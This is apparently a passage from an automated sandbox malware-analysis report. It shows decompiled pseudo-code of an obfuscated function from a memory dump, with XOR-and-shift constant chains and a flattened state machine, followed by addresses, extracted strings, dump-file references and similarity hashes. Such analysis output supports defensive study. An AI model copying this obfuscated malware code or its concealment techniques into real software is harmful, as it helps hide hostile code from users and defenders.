				signed int _t822;
				void* _t829;
				signed int _t830;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				void* _t842;
				signed int _t843;
				signed int _t858;
				void* _t897;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t918;
				signed int* _t924;
				void* _t928;

				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28 & 0x0000ffff);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E048E2523(_a28 & 0x0000ffff);
				_v300 = 0xd1cc29;
				_t924 =  &(( &_v308)[0xe]);
				_v300 = _v300 ^ 0xaa9b9a42;
				_v300 = _v300 ^ 0xaa4a566b;
				_v120 = 0xd766cb;
				_t830 = 0;
				_v120 = _v120 >> 5;
				_t915 = 0x3196c07;
				_v120 = _v120 + 0xffffc2b8;
				_v120 = _v120 ^ 0x00067dfd;
				_v232 = 0x851d10;
				_v232 = _v232 >> 4;
				_v232 = _v232 | 0x68ff3af1;
				_v232 = _v232 + 0xa41e;
				_v232 = _v232 ^ 0x690020c7;
				_v64 = 0x5b203f;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 ^ 0x00008b64;
				_v164 = 0x63d511;
				_v164 = _v164 + 0xffffee15;
				_v8 = 0;
				_t913 = 0x4f;
				_v164 = _v164 / _t913;
				_v164 = _v164 ^ 0x00010347;
				_v140 = 0x5208f;
				_v140 = _v140 + 0xffff4186;
				_v140 = _v140 | 0xcae24784;
				_v140 = _v140 ^ 0xcaa66795;
				_v12 = 0xcd4b66;
				_v12 = _v12 + 0xffffb2fc;
				_v12 = _v12 ^ 0x00c8fe62;
				_v172 = 0x1431ee;
				_v172 = _v172 ^ 0xe76300a3;
				_v172 = _v172 >> 9;
				_v172 = _v172 ^ 0x0473bb98;
				_v72 = 0x2a024b;
				_v72 = _v72 + 0xc1b7;
				_v72 = _v72 ^ 0x0022c402;
				_v116 = 0x1a249a;
				_v116 = _v116 | 0x94501829;
				_v116 = _v116 << 0xe;
				_v116 = _v116 ^ 0x8f2ec200;
				_v292 = 0x42fdbe;
				_v292 = _v292 + 0x9503;
				_v292 = _v292 + 0xffff48ca;
				_v292 = _v292 >> 2;
				_v292 = _v292 ^ 0x0010b7e2;
				_v40 = 0x1c76ed;
				_v40 = _v40 << 0xd;
				_v40 = _v40 ^ 0x0edda000;
				_v204 = 0xdf72f6;
				_v204 = _v204 ^ 0x99836ccc;
				_v204 = _v204 >> 6;
				_v204 = _v204 ^ 0x02657078;
				_v256 = 0x7f2be8;
				_v256 = _v256 + 0x8074;
				_v256 = _v256 << 0xb;
				_v256 = _v256 + 0xf869;
				_v256 = _v256 ^ 0xfd63d828;
				_v84 = 0x77dab9;
				_v84 = _v84 | 0x79e4a371;
				_v84 = _v84 ^ 0x79f7fbe6;
				_v68 = 0xc3d915;
				_v68 = _v68 | 0x94a8eb56;
				_v68 = _v68 ^ 0x94ebfb48;
				_v132 = 0x2f5086;
				_v132 = _v132 + 0xffffb583;
				_v132 = _v132 << 6;
				_v132 = _v132 ^ 0x0bc18243;
				_v76 = 0x1fabb3;
				_v76 = _v76 ^ 0x5273c57e;
				_v76 = _v76 ^ 0x526c6fcd;
				_v300 = 0x8e8c49;
				_v300 = _v300 << 0xf;
				_v300 = _v300 ^ 0x46278df7;
				_v300 = 0x8ee475;
				_v300 = _v300 << 1;
				_v300 = _v300 ^ 0x011c9f5b;
				_v304 = 0x7259a2;
				_v304 = _v304 | 0x64804cb6;
				_v304 = _v304 + 0xffffd1cb;
				_v304 = _v304 ^ 0x64f1a62d;
				_v308 = 0x85033;
				_v308 = _v308 >> 1;
				_v308 = _v308 >> 4;
				_v308 = _v308 ^ 0x6790e852;
				_v308 = _v308 ^ 0x67933f0e;
				_v304 = 0xb400a4;
				_v304 = _v304 * 0x5f;
				_v304 = _v304 >> 1;
				_v304 = _v304 ^ 0x21614ee0;
				_v300 = 0x4fe69a;
				_v300 = _v300 << 0xa;
				_v300 = _v300 ^ 0x3f941466;
				_v308 = 0xceb94b;
				_v308 = _v308 ^ 0x8a35815d;
				_v308 = _v308 << 2;
				_v308 = _v308 + 0xffff3b89;
				_v308 = _v308 ^ 0x2be914c6;
				_v308 = 0x72b949;
				_v308 = _v308 * 0x5f;
				_v308 = _v308 + 0x856b;
				_v308 = _v308 >> 4;
				_v308 = _v308 ^ 0x02aa6435;
				_v308 = 0x3855ef;
				_v308 = _v308 ^ 0xc26dcfeb;
				_v308 = _v308 >> 9;
				_v308 = _v308 + 0xf615;
				_v308 = _v308 ^ 0x006d0aa6;
				_v304 = 0xf05db3;
				_v304 = _v304 ^ 0xdd1eaeb3;
				_v304 = _v304 | 0xcd57129b;
				_v304 = _v304 ^ 0xddf9e192;
				_v304 = 0xe5d59f;
				_v304 = _v304 >> 3;
				_v304 = _v304 | 0xd82d12eb;
				_v304 = _v304 ^ 0xd830880e;
				_v308 = 0xf96c58;
				_v308 = _v308 ^ 0xcd497794;
				_v308 = _v308 >> 8;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x6c0878ec;
				_v112 = 0x549d76;
				_v112 = _v112 | 0xd7795fbc;
				_v112 = _v112 ^ 0x87f0a508;
				_v112 = _v112 ^ 0x50826402;
				_v216 = 0x3f0678;
				_v216 = _v216 + 0x24e9;
				_v216 = _v216 | 0xe5268454;
				_v216 = _v216 >> 4;
				_v216 = _v216 ^ 0x0e538ef0;
				_v224 = 0x2c235d;
				_t239 =  &_v224; // 0x2c235d
				_t832 = 0x54;
				_v224 =  *_t239 / _t832;
				_v224 = _v224 + 0x4b47;
				_v224 = _v224 ^ 0xdeaa23a4;
				_v224 = _v224 ^ 0xdea66806;
				_v108 = 0x63b50d;
				_t833 = 0x75;
				_v108 = _v108 * 0x45;
				_v108 = _v108 ^ 0x1ada951f;
				_v128 = 0x429af;
				_v128 = _v128 / _t833;
				_v128 = _v128 + 0xffff20f8;
				_v128 = _v128 ^ 0xfff26b7c;
				_v16 = 0xcf37d;
				_v16 = _v16 ^ 0xf47dc5d0;
				_v16 = _v16 ^ 0xf47387c1;
				_v196 = 0x7ce77a;
				_v196 = _v196 << 3;
				_v196 = _v196 >> 9;
				_v196 = _v196 ^ 0x00028fc4;
				_v156 = 0x3f887d;
				_v156 = _v156 | 0xf44bd7f3;
				_v156 = _v156 + 0xffff0258;
				_v156 = _v156 ^ 0xf47739ea;
				_v188 = 0x63e935;
				_v188 = _v188 >> 8;
				_v188 = _v188 + 0xffff2425;
				_v188 = _v188 ^ 0xfff73234;
				_v24 = 0x175bba;
				_v24 = _v24 + 0xffffef28;
				_v24 = _v24 ^ 0x00116fa0;
				_v228 = 0x14bf2b;
				_v228 = _v228 ^ 0x9f98aa1b;
				_v228 = _v228 ^ 0xb7a6a3cc;
				_v228 = _v228 ^ 0xda4e4d24;
				_v228 = _v228 ^ 0xf26fd88a;
				_v268 = 0x9ceccb;
				_v268 = _v268 << 0xa;
				_v268 = _v268 + 0xffff08d0;
				_v268 = _v268 * 0x72;
				_v268 = _v268 ^ 0x8554b22a;
				_v88 = 0x5dbfb9;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x00272228;
				_v244 = 0xfbde6e;
				_v244 = _v244 + 0x5af4;
				_v244 = _v244 + 0xffff3210;
				_v244 = _v244 << 6;
				_v244 = _v244 ^ 0x3ed0ab12;
				_v180 = 0x963ad7;
				_v180 = _v180 ^ 0x7886baab;
				_v180 = _v180 + 0xffff09c9;
				_v180 = _v180 ^ 0x780d68b8;
				_v80 = 0x9e10b0;
				_v80 = _v80 | 0xae2b0e0b;
				_v80 = _v80 ^ 0xaeb5bcb2;
				_v148 = 0x7be7e6;
				_v148 = _v148 << 8;
				_v148 = _v148 | 0x0142ad06;
				_v148 = _v148 ^ 0x7be85494;
				_v280 = 0x367665;
				_v280 = _v280 | 0xfffff67f;
				_v280 = _v280 ^ 0xfff2e53f;
				_v212 = 0xf72381;
				_v212 = _v212 + 0xffff2e4f;
				_v212 = _v212 + 0xffff7b98;
				_v212 = _v212 ^ 0x00f0d936;
				_v208 = 0x723ec;
				_v208 = _v208 | 0xe2e26793;
				_v208 = _v208 * 0x65;
				_v208 = _v208 ^ 0x8545d83d;
				_v124 = 0x1deff5;
				_v124 = _v124 + 0xffffaa6b;
				_v124 = _v124 | 0x9135d2e0;
				_v124 = _v124 ^ 0x91314ff1;
				_v288 = 0x86787e;
				_v288 = _v288 << 3;
				_v288 = _v288 ^ 0x319a621a;
				_t834 = 0x4c;
				_v288 = _v288 / _t834;
				_v288 = _v288 ^ 0x00b47538;
				_v252 = 0x89e0e5;
				_t835 = 0x2c;
				_v252 = _v252 * 0x4f;
				_v252 = _v252 >> 0xd;
				_v252 = _v252 ^ 0x178b4366;
				_v252 = _v252 ^ 0x1787f403;
				_v32 = 0xfdee53;
				_v32 = _v32 ^ 0x2185366e;
				_v32 = _v32 ^ 0x2170250f;
				_v236 = 0x55fc8a;
				_v236 = _v236 + 0x15cc;
				_v236 = _v236 * 0x54;
				_v236 = _v236 * 0x6d;
				_v236 = _v236 ^ 0x066e90b6;
				_v104 = 0xfda392;
				_v104 = _v104 ^ 0x79c4e352;
				_v104 = _v104 ^ 0x793a8fcb;
				_v56 = 0xc91cce;
				_v56 = _v56 + 0xfffff402;
				_v56 = _v56 ^ 0x00c263ba;
				_v272 = 0x5a59b6;
				_v272 = _v272 + 0xffffb917;
				_v272 = _v272 * 0x69;
				_v272 = _v272 << 2;
				_v272 = _v272 ^ 0x93c354db;
				_v184 = 0x8fd0ca;
				_v184 = _v184 + 0xffffa535;
				_v184 = _v184 | 0xf05f6e95;
				_v184 = _v184 ^ 0xf0d33a82;
				_v192 = 0xd967c8;
				_v192 = _v192 / _t835;
				_v192 = _v192 | 0x096317b5;
				_v192 = _v192 ^ 0x09603d64;
				_v100 = 0xae60c5;
				_t836 = 0x4b;
				_v100 = _v100 * 0x39;
				_v100 = _v100 ^ 0x26d44587;
				_v264 = 0x13ecdf;
				_v264 = _v264 / _t836;
				_t837 = 7;
				_v264 = _v264 * 0xa;
				_v264 = _v264 + 0xffff2839;
				_v264 = _v264 ^ 0x000caae0;
				_v168 = 0xe37d7f;
				_v168 = _v168 / _t837;
				_v168 = _v168 | 0x3074f611;
				_v168 = _v168 ^ 0x307de6eb;
				_v92 = 0xe11ed;
				_v92 = _v92 >> 0xb;
				_v92 = _v92 ^ 0x0001b24f;
				_v176 = 0x3811fc;
				_v176 = _v176 + 0x9eb8;
				_v176 = _v176 + 0xffffeb15;
				_v176 = _v176 ^ 0x0034f958;
				_v152 = 0x751569;
				_v152 = _v152 ^ 0xf1367d03;
				_t838 = 0x2a;
				_v152 = _v152 / _t838;
				_v152 = _v152 ^ 0x05b938f5;
				_v160 = 0x826d3e;
				_v160 = _v160 + 0xffff0d45;
				_v160 = _v160 << 9;
				_v160 = _v160 ^ 0x02f1c982;
				_v308 = 0x615de7;
				_t508 =  &_v308; // 0x615de7
				_t839 = 0x32;
				_v308 =  *_t508 * 0x5b;
				_v308 = _v308 + 0xffff0e3a;
				_v308 = _v308 >> 0xc;
				_v308 = _v308 ^ 0x000176ef;
				_v248 = 0x940bff;
				_v248 = _v248 / _t839;
				_v248 = _v248 | 0xf3f710e4;
				_v248 = _v248 / _t839;
				_v248 = _v248 ^ 0x04ec6dcd;
				_v48 = 0xcfc725;
				_v48 = _v48 >> 0xf;
				_v48 = _v48 ^ 0x00010a74;
				_v96 = 0x365da7;
				_v96 = _v96 >> 6;
				_v96 = _v96 ^ 0x0002081b;
				_v276 = 0x225d96;
				_v276 = _v276 + 0x2c1;
				_v276 = _v276 / _t913;
				_v276 = _v276 << 6;
				_v276 = _v276 ^ 0x001c07fc;
				_v220 = 0x39c1d0;
				_v220 = _v220 ^ 0x8168a0f4;
				_v220 = _v220 << 3;
				_v220 = _v220 << 0xc;
				_v220 = _v220 ^ 0xb09df3c0;
				_v284 = 0xf9c0bb;
				_v284 = _v284 >> 0xe;
				_v284 = _v284 + 0x14c0;
				_v284 = _v284 << 7;
				_v284 = _v284 ^ 0x000b4193;
				_v20 = 0xc3fb9a;
				_v20 = _v20 + 0x8d16;
				_v20 = _v20 ^ 0x00ccf36e;
				_v240 = 0x8c9adc;
				_v240 = _v240 ^ 0x888f7960;
				_v240 = _v240 + 0xffff62bf;
				_v240 = _v240 + 0xffff86c4;
				_v240 = _v240 ^ 0x880c37e1;
				_v200 = 0xd9fcf3;
				_v200 = _v200 << 4;
				_v200 = _v200 ^ 0xd6e38aec;
				_v200 = _v200 ^ 0xdb711a2e;
				_v260 = 0x11f115;
				_t840 = 0x53;
				_v260 = _v260 / _t840;
				_v260 = _v260 >> 8;
				_v260 = _v260 ^ 0xde7704a7;
				_v260 = _v260 ^ 0xde7b5856;
				_v304 = 0x1851cb;
				_v304 = _v304 ^ 0x0d0756f7;
				_v304 = _v304 + 0x1e91;
				_v304 = _v304 ^ 0x0d150a0a;
				_v136 = 0xc7edb3;
				_v136 = _v136 + 0xffff3700;
				_v136 = _v136 + 0x6375;
				_v136 = _v136 ^ 0x00cba417;
				_v52 = 0x62e7e0;
				_t623 =  &_v52; // 0x62e7e0
				_t841 = 0x23;
				_v52 =  *_t623 / _t841;
				_v52 = _v52 ^ 0x0001b1ca;
				_v144 = 0x12c825;
				_v144 = _v144 >> 0xb;
				_v144 = _v144 << 1;
				_v144 = _v144 ^ 0x0001096e;
				_v300 = 0xe8ad08;
				_v300 = _v300 + 0xffffda27;
				_v300 = _v300 ^ 0x00e4ab5e;
				_v28 = 0x3c1d14;
				_v28 = _v28 | 0xc4f139e0;
				_v28 = _v28 ^ 0xc4f03139;
				_v36 = 0x5a3c12;
				_v36 = _v36 * 0x5f;
				_v36 = _v36 ^ 0x21715166;
				_v44 = 0x139fe3;
				_v44 = _v44 | 0xc7ef95d4;
				_v44 = _v44 ^ 0xc7f6afb5;
				_t914 = _v4;
				_t922 = _v4;
				while(1) {
					L1:
					_t800 = _v296;
					_t842 = 0xd648990;
					while(1) {
						L2:
						_t897 = 0xffd9902;
						while(1) {
							L3:
							_t928 = _t915 - 0xb64b6f6;
							if(_t928 > 0) {
								goto L19;
							}
							L4:
							if(_t928 == 0) {
								_t818 = _a32;
								_t843 =  *_t818;
								__eflags = _t843;
								if(_t843 == 0) {
									_t819 = 0;
									__eflags = 0;
								} else {
									_t819 = _t818[1];
								}
								E048CA2F6(_t914, _t819, _v48, _v96, _v276, _a44, _t843, _v220, _v284);
								_t924 =  &(_t924[8]);
								asm("sbb esi, esi");
								_t915 = (_t915 & 0x0876ac85) + 0x337366e;
								while(1) {
									L1:
									_t800 = _v296;
									_t842 = 0xd648990;
									goto L2;
								}
							} else {
								if(_t915 == 0x7d36d3) {
									_push(_v128);
									_push(_v204);
									_push(_v108);
									_push(_v224);
									_t822 = E048CF2CC(_v216);
									_t922 = _t822;
									__eflags = _t822;
									_t915 =  !=  ? 0xffd9902 : 0x2d9c50f;
									E048C2043(0, _v16, _v196, _v156);
									_t924 = _t924 - 0x10 + 0x28;
									_t842 = 0xd648990;
									_t897 = 0xffd9902;
									goto L37;
								} else {
									if(_t915 == 0x1dc854f) {
										E048C54DA(_v300, _v28, _v36, _v44, _t922);
									} else {
										if(_t915 == 0x3196c07) {
											_t915 = 0xb6d7c5f;
											continue;
										} else {
											if(_t915 == 0x337366e) {
												E048C54DA(_v20, _v240, _v200, _v260, _t914);
												_t924 =  &(_t924[3]);
												L12:
												_t915 = 0xbb8862e;
												while(1) {
													L1:
													_t800 = _v296;
													_t842 = 0xd648990;
													goto L2;
												}
											} else {
												if(_t915 != 0x8f009c2) {
													L37:
													__eflags = _t915 - 0x2d9c50f;
													if(_t915 != 0x2d9c50f) {
														_t800 = _v296;
														continue;
													}
												} else {
													E048DF83F(_t914, _a16);
													_t915 = 0x337366e;
													_t829 = 1;
													_t830 =  !=  ? _t829 : _t830;
													while(1) {
														L1:
														_t800 = _v296;
														_t842 = 0xd648990;
														L2:
														_t897 = 0xffd9902;
														while(1) {
															L3:
															_t928 = _t915 - 0xb64b6f6;
															if(_t928 > 0) {
																goto L19;
															}
															goto L4;
														}
														goto L19;
													}
												}
											}
										}
									}
								}
							}
							L40:
							return _t830;
							L41:
							L19:
							__eflags = _t915 - 0xb6d7c5f;
							if(_t915 == 0xb6d7c5f) {
								_t915 = 0x7d36d3;
								goto L37;
							} else {
								__eflags = _t915 - 0xbade2f3;
								if(__eflags == 0) {
									__eflags = E048DBC05(_t914, _v120, __eflags) - _v232;
									_t915 =  ==  ? 0x8f009c2 : 0x337366e;
									goto L1;
								} else {
									__eflags = _t915 - 0xbb8862e;
									if(_t915 == 0xbb8862e) {
										E048C54DA(_v304, _v136, _v52, _v144, _t800);
										_t924 =  &(_t924[3]);
										_t915 = 0x1dc854f;
										while(1) {
											L1:
											_t800 = _v296;
											_t842 = 0xd648990;
											goto L2;
										}
									} else {
										__eflags = _t915 - _t842;
										if(_t915 == _t842) {
											__eflags =  *_a32;
											if(__eflags == 0) {
												_t806 = _v8;
											} else {
												_push(_v148);
												_push(0x48c1608);
												_v8 = E048C3F5C(_v180, _v80, __eflags);
											}
											_t858 = _v40 | _v292 | _v116 | _v72 | _v172 | _v12 | _v140 | _v164 | _v64;
											_t918 = _a48 & 1;
											__eflags = _t918;
											if(_t918 != 0) {
												__eflags = _t858;
											}
											_t914 = E048C8A5E(_v280, _v296, _v212, _v208, _v124, _v288, _t858, _t858, _t858, _t858, _t806, _t858, _v252, _v32, _v236, _a4);
											E048E0352(_v104, _v56, _v8, _v272);
											_t924 =  &(_t924[0x10]);
											__eflags = _t914;
											if(_t914 == 0) {
												goto L12;
											} else {
												_v60 = 1;
												E048C53F7( &_v60, _v256, _v184, 4, _v192, _t914, _v100, _v264);
												_t924 =  &(_t924[6]);
												__eflags = _t918;
												if(_t918 != 0) {
													E048C40B0(_v84, _t914, _v168, _v92,  &_v60, _v176,  &_v4);
													_t739 =  &_v60;
													 *_t739 = _v60 | _v76;
													__eflags =  *_t739;
													E048C53F7( &_v60, _v68, _v152, _v4, _v160, _t914, _v308, _v248);
													_t924 =  &(_t924[0xb]);
												}
												_t915 = 0xb64b6f6;
												while(1) {
													L1:
													_t800 = _v296;
													_t842 = 0xd648990;
													goto L2;
												}
											}
											goto L41;
										} else {
											__eflags = _t915 - _t897;
											if(_t915 != _t897) {
												goto L37;
											} else {
												_t800 = E048E30FB(_a40, _v188, _v24, _v132, _v228, _t922, _t842, _v268, _v88, _a28, _t842, _v244);
												_t924 =  &(_t924[0xc]);
												_v296 = _t800;
												__eflags = _t800;
												_t842 = 0xd648990;
												_t915 =  !=  ? 0xd648990 : 0x1dc854f;
												goto L2;
											}
										}
									}
								}
							}
							goto L40;
						}
					}
				}
			}

0x048caca6
0x048cacb0
0x048cacb7
0x048cacbe
0x048cacc5
0x048caccc
0x048caccd
0x048cacd4
0x048cacdb
0x048cace2
0x048cace9
0x048cacf0
0x048cacf7
0x048cacf8
0x048cacf9
0x048cacfe
0x048cad06
0x048cad09
0x048cad13
0x048cad1d
0x048cad28
0x048cad2a
0x048cad32
0x048cad37
0x048cad42
0x048cad4d
0x048cad55
0x048cad5a
0x048cad62
0x048cad6a
0x048cad72
0x048cad7d
0x048cad85
0x048cad90
0x048cad9b
0x048cada6
0x048cadb6
0x048cadb9
0x048cadc0
0x048cadcb
0x048cadd6
0x048cade1
0x048cadec
0x048cadf7
0x048cae02
0x048cae0d
0x048cae18
0x048cae23
0x048cae2e
0x048cae36
0x048cae41
0x048cae4c
0x048cae57
0x048cae62
0x048cae6d
0x048cae78
0x048cae80
0x048cae8b
0x048cae93
0x048cae9b
0x048caea3
0x048caea8
0x048caeb0
0x048caebb
0x048caec3
0x048caece
0x048caed6
0x048caede
0x048caee3
0x048caeeb
0x048caef3
0x048caefb
0x048caf00
0x048caf08
0x048caf10
0x048caf1b
0x048caf26
0x048caf31
0x048caf3c
0x048caf47
0x048caf52
0x048caf5d
0x048caf68
0x048caf70
0x048caf7b
0x048caf86
0x048caf91
0x048caf9c
0x048cafa4
0x048cafa9
0x048cafb1
0x048cafb9
0x048cafbd
0x048cafc5
0x048cafcd
0x048cafd5
0x048cafdd
0x048cafe5
0x048cafed
0x048caff1
0x048caff6
0x048caffe
0x048cb006
0x048cb013
0x048cb017
0x048cb01b
0x048cb023
0x048cb02b
0x048cb030
0x048cb038
0x048cb040
0x048cb048
0x048cb04d
0x048cb055
0x048cb05d
0x048cb06a
0x048cb06e
0x048cb076
0x048cb07b
0x048cb083
0x048cb08b
0x048cb093
0x048cb098
0x048cb0a0
0x048cb0a8
0x048cb0b0
0x048cb0b8
0x048cb0c0
0x048cb0c8
0x048cb0d0
0x048cb0d5
0x048cb0dd
0x048cb0e5
0x048cb0ed
0x048cb0f5
0x048cb0fa
0x048cb0ff
0x048cb107
0x048cb112
0x048cb11d
0x048cb128
0x048cb133
0x048cb13b
0x048cb143
0x048cb14b
0x048cb150
0x048cb15a
0x048cb162
0x048cb168
0x048cb16d
0x048cb173
0x048cb17b
0x048cb183
0x048cb18b
0x048cb19e
0x048cb19f
0x048cb1a6
0x048cb1b1
0x048cb1c5
0x048cb1cc
0x048cb1d7
0x048cb1e2
0x048cb1ed
0x048cb1f8
0x048cb203
0x048cb20e
0x048cb216
0x048cb21e
0x048cb229
0x048cb234
0x048cb23f
0x048cb24a
0x048cb255
0x048cb260
0x048cb268
0x048cb273
0x048cb27e
0x048cb289
0x048cb294
0x048cb29f
0x048cb2a7
0x048cb2af
0x048cb2b7
0x048cb2bf
0x048cb2c7
0x048cb2cf
0x048cb2d4
0x048cb2e1
0x048cb2e5
0x048cb2ed
0x048cb2f8
0x048cb2ff
0x048cb30a
0x048cb312
0x048cb31a
0x048cb322
0x048cb327
0x048cb32f
0x048cb33a
0x048cb345
0x048cb350
0x048cb35b
0x048cb366
0x048cb371
0x048cb37c
0x048cb387
0x048cb38f
0x048cb39a
0x048cb3a5
0x048cb3ad
0x048cb3b5
0x048cb3bd
0x048cb3c5
0x048cb3cd
0x048cb3d5
0x048cb3dd
0x048cb3e5
0x048cb3f2
0x048cb3f6
0x048cb3fe
0x048cb409
0x048cb416
0x048cb421
0x048cb42c
0x048cb434
0x048cb439
0x048cb447
0x048cb44c
0x048cb452
0x048cb45a
0x048cb467
0x048cb46a
0x048cb46e
0x048cb473
0x048cb47b
0x048cb483
0x048cb48e
0x048cb499
0x048cb4a4
0x048cb4ac
0x048cb4b9
0x048cb4c2
0x048cb4c6
0x048cb4ce
0x048cb4d9
0x048cb4e4
0x048cb4ef
0x048cb4fa
0x048cb505
0x048cb510
0x048cb518
0x048cb525
0x048cb529
0x048cb52e
0x048cb536
0x048cb541
0x048cb54c
0x048cb557
0x048cb562
0x048cb578
0x048cb57f
0x048cb58a
0x048cb595
0x048cb5a8
0x048cb5ab
0x048cb5b2
0x048cb5bd
0x048cb5cd
0x048cb5d6
0x048cb5d7
0x048cb5db
0x048cb5e3
0x048cb5eb
0x048cb5ff
0x048cb606
0x048cb611
0x048cb61c
0x048cb627
0x048cb62f
0x048cb63a
0x048cb647
0x048cb652
0x048cb65d
0x048cb668
0x048cb673
0x048cb687
0x048cb68c
0x048cb693
0x048cb69e
0x048cb6a9
0x048cb6b4
0x048cb6bc
0x048cb6c7
0x048cb6cf
0x048cb6d6
0x048cb6d9
0x048cb6dd
0x048cb6e5
0x048cb6ea
0x048cb6f2
0x048cb702
0x048cb706
0x048cb716
0x048cb71a
0x048cb722
0x048cb72d
0x048cb735
0x048cb740
0x048cb74b
0x048cb753
0x048cb75e
0x048cb766
0x048cb776
0x048cb77a
0x048cb77f
0x048cb787
0x048cb78f
0x048cb797
0x048cb79c
0x048cb7a1
0x048cb7a9
0x048cb7b1
0x048cb7b6
0x048cb7be
0x048cb7c3
0x048cb7cb
0x048cb7d6
0x048cb7e1
0x048cb7ec
0x048cb7f4
0x048cb7fc
0x048cb804
0x048cb80c
0x048cb814
0x048cb81f
0x048cb827
0x048cb832
0x048cb83d
0x048cb849
0x048cb84c
0x048cb850
0x048cb855
0x048cb85d
0x048cb867
0x048cb86f
0x048cb877
0x048cb87f
0x048cb887
0x048cb892
0x048cb89d
0x048cb8a8
0x048cb8b3
0x048cb8be
0x048cb8c7
0x048cb8ca
0x048cb8d1
0x048cb8dc
0x048cb8e7
0x048cb8ef
0x048cb8f6
0x048cb901
0x048cb909
0x048cb911
0x048cb919
0x048cb924
0x048cb92f
0x048cb93a
0x048cb94d
0x048cb954
0x048cb95f
0x048cb96a
0x048cb975
0x048cb980
0x048cb987
0x048cb98e
0x048cb98e
0x048cb98e
0x048cb992
0x048cb997
0x048cb997
0x048cb997
0x048cb99c
0x048cb99c
0x048cb99c
0x048cb9a2
0x00000000
0x00000000
0x048cb9a8
0x048cb9a8
0x048cbaa0
0x048cbaa7
0x048cbaa9
0x048cbaab
0x048cbab2
0x048cbab2
0x048cbaad
0x048cbaad
0x048cbaad
0x048cbad9
0x048cbade
0x048cbae3
0x048cbaeb
0x048cb98e
0x048cb98e
0x048cb98e
0x048cb992
0x00000000
0x048cb992
0x048cb9ae
0x048cb9b4
0x048cba2f
0x048cba39
0x048cba40
0x048cba47
0x048cba5c
0x048cba68
0x048cba7d
0x048cba84
0x048cba89
0x048cba8e
0x048cba91
0x048cba96
0x00000000
0x048cb9b6
0x048cb9bc
0x048cbdb8
0x048cb9c2
0x048cb9c8
0x048cba25
0x00000000
0x048cb9ca
0x048cb9d0
0x048cba13
0x048cba18
0x048cba1b
0x048cba1b
0x048cb98e
0x048cb98e
0x048cb98e
0x048cb992
0x00000000
0x048cb992
0x048cb9d2
0x048cb9d9
0x048cbd8d
0x048cbd8d
0x048cbd93
0x048cbd95
0x00000000
0x048cbd95
0x048cb9df
0x048cb9e8
0x048cb9ef
0x048cb9f6
0x048cb9f7
0x048cb98e
0x048cb98e
0x048cb98e
0x048cb992
0x048cb997
0x048cb997
0x048cb99c
0x048cb99c
0x048cb99c
0x048cb9a2
0x00000000
0x00000000
0x00000000
0x048cb9a2
0x00000000
0x048cb99c
0x048cb98e
0x048cb9d9
0x048cb9d0
0x048cb9c8
0x048cb9bc
0x048cb9b4
0x048cbdc3
0x048cbdcc
0x00000000
0x048cbaf6
0x048cbaf6
0x048cbafc
0x048cbd88
0x00000000
0x048cbb02
0x048cbb02
0x048cbb08
0x048cbd79
0x048cbd80
0x00000000
0x048cbb0e
0x048cbb0e
0x048cbb14
0x048cbd50
0x048cbd55
0x048cbd58
0x048cb98e
0x048cb98e
0x048cb98e
0x048cb992
0x00000000
0x048cb992
0x048cbb1a
0x048cbb1a
0x048cbb1c
0x048cbb86
0x048cbb89
0x048cbbb5
0x048cbb8b
0x048cbb8b
0x048cbba0
0x048cbbac
0x048cbbac
0x048cbbfb
0x048cbc02
0x048cbc02
0x048cbc04
0x048cbc06
0x048cbc06
0x048cbc59
0x048cbc6a
0x048cbc6f
0x048cbc72
0x048cbc74
0x00000000
0x048cbc7a
0x048cbc97
0x048cbcab
0x048cbcb0
0x048cbcb3
0x048cbcb5
0x048cbce5
0x048cbcfc
0x048cbcfc
0x048cbcfc
0x048cbd24
0x048cbd29
0x048cbd29
0x048cbd2c
0x048cb98e
0x048cb98e
0x048cb98e
0x048cb992
0x00000000
0x048cb992
0x048cb98e
0x00000000
0x048cbb1e
0x048cbb1e
0x048cbb20
0x00000000
0x048cbb26
0x048cbb5f
0x048cbb64
0x048cbb67
0x048cbb6b
0x048cbb72
0x048cbb77
0x00000000
0x048cbb77
0x048cbb20
0x048cbb1c
0x048cbb14
0x048cbb08
0x00000000
0x048cbafc
0x048cb99c
0x048cb997

Strings

z|, xrefs: 048CB203
$, xrefs: 048CB13B
fQq!, xrefs: 048CB945
]#,, xrefs: 048CB162
? [, xrefs: 048CAD72
{, xrefs: 048CB37C
]a, xrefs: 048CB6CF
ev6, xrefs: 048CB3A5
fQq!, xrefs: 048CB954
d=`, xrefs: 048CB58A
}0, xrefs: 048CB611
uc, xrefs: 048CB89D
]a, xrefs: 048CB065
Na!, xrefs: 048CB01B
("', xrefs: 048CB2FF
d=`, xrefs: 048CB56D
b, xrefs: 048CB8BE
GK, xrefs: 048CB173

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: ("'$? [$GK$]#,$d=`$d=`$ev6$fQq!$fQq!$uc$z|$$$Na!$]a$]a$b${$}0
API String ID: 0-1223376802
Opcode ID: e304d51104514c5f9b38df3e32d5c474898481ec3901b18ef5989578ffcc2220
Instruction ID: 7b5ed9b579138a616f301756fa96cd8fe33fe285604e361388e9f06c376abf6f
Opcode Fuzzy Hash: e304d51104514c5f9b38df3e32d5c474898481ec3901b18ef5989578ffcc2220
Instruction Fuzzy Hash: 47820F715087818FD3B9CF25D54AA9BBBE1BBC4308F108E1DE1DA96260D7B19949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 048C5AB2, Relevance: 21.8, Strings: 17, Instructions: 590
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E048C5AB2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
